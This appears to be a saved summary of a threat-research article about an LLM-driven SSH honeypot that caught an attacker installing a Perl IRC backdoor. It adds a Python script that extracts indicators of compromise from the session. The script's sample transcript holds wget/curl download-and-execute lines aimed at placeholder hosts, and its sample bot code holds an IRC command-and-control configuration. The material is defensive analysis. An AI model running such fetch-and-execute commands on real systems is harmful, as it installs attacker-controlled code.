Saved February 14, 2026
Do you care about this?
The article details how an SSH honeypot whose shell is emulated by an LLM lured a threat actor who downloaded exploit binaries and tried to enrol the host in an IRC botnet. By analysing the actor's commands and the scripts they fetched, the author identified the command-and-control infrastructure in use, which led to action against the associated IRC channels.
If you do, here's more
A real threat actor was captured by Beelzebub, an SSH honeypot that uses an LLM to emulate the shell and is driven by a simple configuration file. The attacker, unaware they were inside a honeypot, downloaded several binaries containing known exploits and, notably, tried to run a Perl script designed to connect the host to a botnet. The honeypot recorded the attacker's source IP address (45.175.100.69) and the credentials used to log in (admin/123456).
The commands executed during the session made the actor's intent clear. They downloaded a Perl script named "sshd" from a compromised Joomla site; the script is a backdoor that accepts remote commands and launches denial-of-service attacks, and its configuration points it at an IRC channel used for command and control. The session log shows several attempts to start the backdoor, indicating the attacker's persistence.
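The two analysis steps the summary describes (reading the session transcript for download-and-execute behaviour, then reading the fetched Perl bot for its IRC command-and-control settings) can be automated. The following is an added example, not code from the article or from the Beelzebub project. The session transcript and the Perl excerpt are constructed to mirror what the article describes; the hostnames, the variable names in the Perl snippet and the `LOGIN` line format are assumptions, while the IP, credentials and channel names are the ones the article reports.

```python
"""Extract IOCs from an SSH honeypot session and from the Perl IRC bot it fetched.

Added example (not Beelzebub's code or the article's). Inputs below are
constructed; hostnames are placeholders, not infrastructure from the article.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed transcript in the shape an SSH honeypot might log a session.
SESSION = """\
LOGIN user=admin pass=123456 src=45.175.100.69
$ cd /tmp
$ wget -q http://joomla-victim.example.invalid/images/sshd -O sshd
$ perl sshd
$ curl -s -o x.pl http://joomla-victim.example.invalid/images/sshd && perl x.pl
"""

# Constructed excerpt in the style of common Perl IRC bots (variable names assumed).
PERL_BOT = r'''
my $servidor = 'irc.c2.example.invalid';
my $porta = '6667';
my @canais = ("#rootbox", "#c0d3rs-TeaM");
my @adms = ("r00t");
$nick = "sshd" . int(rand(999));
'''

LOGIN_RE = re.compile(r"LOGIN user=(\S+) pass=(\S+) src=(\S+)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
FETCH_RE = re.compile(r"\b(?:wget|curl)\b")
# Interpreter invocations whose argument we treat as the executed file.
EXEC_RE = re.compile(r"\b(?:perl|sh|bash|python\d?)\s+(\S+)")
OUTFILE_RE = re.compile(r"\s-[oO]\s+(\S+)")  # wget -O / curl -o
SPLIT_RE = re.compile(r"\s*(?:&&|\|\||;)\s*")  # split chained commands


@dataclass
class SessionIOCs:
    src_ip: str | None
    credentials: tuple[str, str] | None
    urls: list[str]
    download_then_exec: list[tuple[str, str]]  # (url, local file that was run)


@dataclass
class IrcC2:
    server: str | None
    port: int | None
    channels: list[str]


def parse_session(transcript: str) -> SessionIOCs:
    """Pull login data, fetched URLs and fetch->execute pairs out of a transcript."""
    src_ip = creds = None
    urls: list[str] = []
    pairs: list[tuple[str, str]] = []
    fetched: dict[str, str] = {}  # local filename -> URL it was fetched from
    for line in transcript.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            creds, src_ip = (m.group(1), m.group(2)), m.group(3)
            continue
        for cmd in SPLIT_RE.split(line.lstrip("$ ")):
            found = URL_RE.findall(cmd)
            if FETCH_RE.search(cmd) and found:
                urls.extend(u for u in found if u not in urls)
                out = OUTFILE_RE.search(cmd)
                name = out.group(1) if out else found[0].rsplit("/", 1)[-1]
                fetched[name] = found[0]
            for e in EXEC_RE.finditer(cmd):
                if e.group(1) in fetched:  # a previously downloaded file was run
                    pairs.append((fetched[e.group(1)], e.group(1)))
    return SessionIOCs(src_ip, creds, urls, pairs)


IRC_SERVER_RE = re.compile(r"\$(?:servidor|server|host|ircserver)\s*=\s*['\"]([^'\"]+)['\"]", re.I)
IRC_PORT_RE = re.compile(r"\$(?:porta|port)\s*=\s*['\"]?(\d{2,5})['\"]?", re.I)
CHANNEL_RE = re.compile(r"[\"'](#[^\"'\s,]+)[\"']")


def extract_irc_c2(source: str) -> IrcC2:
    """Recover IRC server, port and channel list from a Perl bot's source text."""
    s = IRC_SERVER_RE.search(source)
    p = IRC_PORT_RE.search(source)
    chans = list(dict.fromkeys(CHANNEL_RE.findall(source)))  # dedupe, keep order
    return IrcC2(s.group(1) if s else None, int(p.group(1)) if p else None, chans)


if __name__ == "__main__":
    print(parse_session(SESSION))
    print(extract_irc_c2(PERL_BOT))
```

The fetch/execute pairing is what turns a noisy transcript into an actionable finding: a URL that is downloaded and then immediately run is the payload to pull and analyse, and the channel list recovered from it is what you would hand to the IRC network's operators when asking for the channels to be closed.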
To investigate further, the author joined the IRC channels the threat actor used and identified two, #rootbox and #c0d3rs-TeaM, that hosted the actor's communications. The article concludes by noting that botnets of this kind can be disrupted by getting these channels closed, and stresses the value of monitoring and mitigating threats in real time.